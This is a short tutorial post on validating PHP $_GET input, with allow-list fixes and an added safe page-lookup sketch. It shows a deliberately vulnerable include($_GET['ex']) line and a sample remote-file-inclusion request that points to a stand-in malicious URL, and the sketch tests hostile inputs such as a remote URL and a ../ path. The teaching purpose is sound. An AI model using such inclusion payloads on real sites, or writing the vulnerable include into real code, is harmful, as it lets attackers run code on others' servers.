
PHP GET Security

Posted by ALonon in Security

It is very important to check any data you read from $_GET before you use it.

$_GET is used in several different situations, and each one calls for different precautions.

For example, suppose you write something like this:

if (isset($_GET['ex']))

   include($_GET['ex']);

With this code, a malicious user can include any page they want in your web page, for example by requesting:

?ex=http://www.example.com/bad_page.php

With this they can include any page that they want. To prevent it, accept only values from a fixed list of operations:

$operation = array('add', 'delete', 'edit', 'save');

if (isset($_GET['ex']) && in_array($_GET['ex'], $operation, true)) {
   // ... do something ...
}

You can also use switch or if.

switch ($_GET['ex'] ?? '') {
case 'add':
   // something...
   break;
case 'delete':
   // something...
   break;
default:
   // something...
   break;
}

With if:

$ex = $_GET['ex'] ?? '';

if ($ex == "add") {
   // Do something..
}

else if ($ex == "delete") {
   // Do something..
}

else
   die("possible hack attempt");
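
Tying the allowed-values check back to the include() case from the start of the post: the sketch below is an added example, not code from the original post. It maps each allowed ?ex= value to a fixed file, so the request value itself never reaches include(). The PAGES table, the resolve_page() helper and the file paths are hypothetical names chosen for illustration.

```php
<?php
// Added example, not the post's code. File paths are hypothetical.
declare(strict_types=1);

// Each allowed ?ex= value maps to a fixed file chosen by the developer.
const PAGES = [
    'add'    => 'pages/add.php',
    'delete' => 'pages/delete.php',
    'edit'   => 'pages/edit.php',
    'save'   => 'pages/save.php',
];

// Return the file to include for this query string, or null to reject.
function resolve_page(array $query): ?string
{
    $ex = $query['ex'] ?? null;
    // ?ex[]=add turns the parameter into an array; accept strings only.
    if (!is_string($ex)) {
        return null;
    }
    // Exact key match: URLs and ../ paths are simply not keys in PAGES.
    return array_key_exists($ex, PAGES) ? PAGES[$ex] : null;
}

// Constructed sample requests, standing in for $_GET.
$samples = [
    ['ex' => 'add'],
    ['ex' => 'http://www.example.com/bad_page.php'],
    ['ex' => '../pages/add.php'],
    ['ex' => ['add']],
    ['ex' => 'ADD'],
    [],
];
foreach ($samples as $query) {
    $file = resolve_page($query);
    printf("%-55s => %s\n", json_encode($query), $file ?? 'REJECTED');
}

// In the page itself (commented out so the demo runs without those files):
// $file = resolve_page($_GET);
// if ($file === null) { http_response_code(400); exit('Unknown operation'); }
// include __DIR__ . '/' . $file;
```

Only the first sample resolves to a file; the remote URL, the relative path, the array form, the wrong-case value and the missing parameter are all rejected.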
